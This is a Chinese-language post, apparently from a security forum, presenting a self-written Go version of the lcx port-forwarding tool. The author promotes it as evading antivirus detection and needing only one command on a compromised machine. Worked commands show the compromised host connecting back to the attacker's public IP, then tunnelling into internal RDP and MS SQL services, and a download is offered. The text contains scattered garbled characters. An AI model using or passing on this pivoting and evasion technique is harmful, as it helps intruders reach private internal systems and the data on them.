背景介紹
經(jīng)常有朋友使用lcx�,但是由于很多原因可能lcx都不好使,例如下面幾點(diǎn):
1����、linux下不支持lcx,這時只能拿msf出來�;
2、不免殺�;
3、每次內(nèi)網(wǎng)要重新連接其他主機(jī)的時候���,都必須重新進(jìn)去并重新敲打命令 �����,并且操作過多時容易被發(fā)現(xiàn)���。
最近正好上面那些問題都碰上了�����,于是沒辦法就使用golang自己寫了一個���。我寫的這個lcx有以下幾個特點(diǎn):
1�����、golang程序跨平臺性���,甚至嵌入式Linux都支持����;
2�、免殺,基本上目前golang程序都不會被識別為病毒�;
3、肉雞只需操作一次�����,其他的都交給主控端操作���。
該工具運(yùn)行界面如下所示:
使用方法
為了講解該工具的功能和使用方法�,以下列場景展開介紹:
前提介紹:
網(wǎng)絡(luò)拓?fù)淙缟蠄D所示�����,內(nèi)網(wǎng)私有�����,外網(wǎng)無法直接訪問內(nèi)網(wǎng)任意主機(jī),但其中A已經(jīng)控制了B�。
實(shí)現(xiàn)目標(biāo):
攻擊者A通過B 連接內(nèi)網(wǎng)中任意一臺計(jì)算機(jī)(如遠(yuǎn)程桌面,數(shù)據(jù)庫等)��。
場景一:A連接內(nèi)網(wǎng)中C的遠(yuǎn)程桌面
第一步: 在B上面輸入指令:
lcx 111.13.100.92 123
第二步:假如 A 想連接內(nèi)網(wǎng)中 C 的遠(yuǎn)程桌面���,那么在A上輸入指令:
lcx 456 123 192.168.10.3 3389
這時����, A 只用連接本機(jī)的456端口就等于連接內(nèi)網(wǎng)C的3389端口了���。
場景二:A連接內(nèi)網(wǎng)中其他機(jī)器的MS SQL數(shù)據(jù)庫(假設(shè)IP地址為192.168.10.55)
第一步����,在B上輸入指令:
lcx 111.13.100.92 123
第二步��,在A上輸入指令:
lcx 1433 123 192.168.10.55 1433
這時�����,A只用連接本機(jī)1433端口就等于連接內(nèi)網(wǎng)中(192.168.10.55)的1433端口了��。
工具下載
暫時只提供windows版本:lcx._g
本文作者:PulseO0O
附件:lcx._g.rar
該文章在 2021/2/3 17:29:24 編輯過
400 186 1886
